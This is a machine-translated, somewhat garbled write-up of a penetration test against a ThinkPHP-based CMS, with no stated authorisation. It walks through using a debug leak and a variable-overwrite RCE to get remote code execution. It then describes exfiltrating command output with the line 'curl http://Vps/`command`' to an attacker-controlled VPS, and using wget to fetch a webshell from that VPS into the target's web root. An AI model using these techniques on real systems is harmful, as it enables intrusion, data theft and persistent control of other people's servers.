Penetration practice - no echo rce thinkphp5 getshell

Find a login interface in the process of information collection
In the process of testing logical vulnerabilities , When modifying the parameters, it broke out Debug

adopt Debug Information learned , This is a thinphp Of cms

Before thinkphp The log leak vulnerability of has been tried and tested repeatedly , So I want to find the log first

adopt Debug You can know that his root directory is /www/wwwroot/devorder/public

visit Public A file in a directory , Can't access runtime Catalog , We can only find another way

Found at the bottom Cms Version number of , So I went to the Internet to find the open loopholes of this version

After searching for 、 test , It is found that there are... Caused by variable coverage Rce Loophole
Specific vulnerability analysis can refer to https://blog.csdn.net/xuandao_ahfengren/article/details/86333189

Direct use of online Payload The function that prompts to execute the command is disabled , Estimation is Disable_function The role of

There are several functions that execute commands. After sending a request, they will directly return to the login interface , Unknown execution state

So I found an online DnsLog platform , This platform will randomly give a subdomain name .
If you send to a subdomain Http、Icmp My bag , The platform will receive packets , So as to determine whether the command is executed .
In this way sql This method also works wonders in Injection .

For specific usage, please refer to the article written by the master :https://www.cnblogs.com/sstfy/p/10351807.html

Several times here Ping After that, I still can't receive the return , Guess maybe Icmp The bag was stopped , Instead of using Curl Request subdomain name

Successfully received request

This kind of online can only simply verify whether it exists Rce, Unable to get command echo .

If you want command echo , You can use online Ceye Platform to receive echo .

You can also use your own Vps To receive echo

stay Vps Turn on Web The service or firewall is not disabled Icmp When , send out Http or Icmp After the package, a record will be left in the log , The command echo can be obtained by directly viewing the log records .

for example ：

 curl http://Vps/`command`

Here, use the return quotation mark to wrap the command to be executed , The principle is Linux Executing a command in will first execute the command in anti single quotation marks , And output the result .
This code is after execution whoami after , The returned value will be spliced into http://Vps/ after .

I choose to open here Web service
Look at the results returned this time , The access record in the log is http://Vps/www , We can know that the target system is Linux, And use WWW Permission on Web service .

Getshell
tried bash rebound Shell The way didn't bounce back .
I don't know why I use echo >> The method can't be written in , Finally using Wget Download the file to the specified directory .

These two questions , If it's convenient for you to know the master, tell me through comments , Thank you first .
adopt Debug The absolute path in WebShell I can't find what I wrote after Webshell, So in Web Find the login interface under the directory , Success is really . Absolute path .

take Webshell Written in VPS in , Again using Wget download Webshell To the truth . Absolute path , success Getshell.